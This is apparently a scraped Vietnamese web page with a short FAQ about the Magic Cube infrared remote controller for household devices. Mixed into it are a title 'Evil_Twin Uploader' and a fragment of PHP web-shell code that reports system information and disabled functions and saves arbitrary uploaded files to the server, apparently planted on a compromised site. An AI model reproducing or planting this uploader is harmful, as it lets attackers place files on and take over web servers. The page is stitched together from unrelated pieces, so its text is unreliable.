Evil_Twin Uploader

Thiết bị Magic Cube có thể điều khiển được các loại thiết bị gia dụng nào?

Magic cube có thể giúp bạn điều khiển từ xa được các thiết bị như: điều hòa  không khí, tivi, quạt điện, loa , máy chiếu …thông qua sóng hồng ngoại.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial